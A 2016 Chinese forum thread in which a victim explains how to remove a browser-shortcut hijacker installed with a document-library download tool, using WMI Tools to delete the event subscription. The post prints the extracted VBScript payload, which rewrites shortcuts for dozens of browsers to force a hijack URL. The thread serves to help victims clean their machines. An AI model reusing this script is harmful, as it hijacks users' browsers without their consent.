献给被XX文库下载软件篡改主页的同学们
本帖最后由 songtao6 于 2016-7-28 23:57 编辑今天早上在软件更新区下载了一回复量很高(记忆中10页左右,不知道是否准确)的文库下载工具(帖子地址为:https://www.chinapyg.com/thread-85769-1-1.html 已经被BAN了),安装之后发现居然是N久以前的软件,并且浏览器的快捷方式被加上了小尾巴,虽然软件已经删除,但是估计主页小尾巴还在,问题不大,却影响着我们美好的心情。下午安装无数杀软/监控软件,均未找到源头,最后通过我们万能的网络和朋友,在23点时候,终于找到了高手们解决这个可恶的小尾巴的方法。至于有没有后门就只有请大婶们费心看下!!!
第一步:进入http://www.microsoft.com/en-us/download/details.aspx?id=24045下载WMITool安装
第二步:开始菜单中找到WMI Tools 运行WMI Event Viewer
第三步:点击register for events
第四步:输入root\CIMV2 点击OK、OK
第五步:接着在左边右键删除之,当然,想看代码的在右边右键view 如图
打完收工,小尾巴不见了!!!顺便贴下代码
On Error Resume Next:Const link = "http://hk.jtsh123.com/?r=b&m=11":Const link360 = "http://hk.jtsh123.com/?r=b&m=11&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\??\Desktop,C:\Users\??\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\??\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\??\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\??\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
以上方法来自于一高手,我只是搬运工,据悉这种方式的产品很难杀毒,今天也尝试了好多个杀软,并且在安装时我的杀软居然没有报毒!!!
不知道是否有后门,留待大婶检测
感谢分享,世界因你而精彩、。 这样怎么办 谢谢!!!!!!!!!!! jjin999 发表于 2016-7-29 09:08
这样怎么办
右键管理员身份运行
就是那个SetHomePage.dll做的好事 提取下安装包删掉它 自己注册下必要文件就行了 谢谢,已经搞定了 沙发,,,,,,。。。。。 给楼主赞一个,前来支持。 感谢楼主分享经验!!!
页:
[1]
2